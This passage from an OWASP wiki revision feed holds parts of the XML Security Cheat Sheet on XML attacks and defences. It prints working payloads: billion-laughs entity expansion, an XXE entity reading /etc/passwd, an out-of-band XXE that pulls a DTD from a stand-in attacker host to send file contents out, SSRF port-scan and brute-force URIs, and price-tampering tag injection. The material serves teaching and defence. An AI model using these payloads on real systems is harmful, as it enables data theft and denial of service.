 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224428</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224428"/>
				<updated>2016-12-21T20:15:13Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
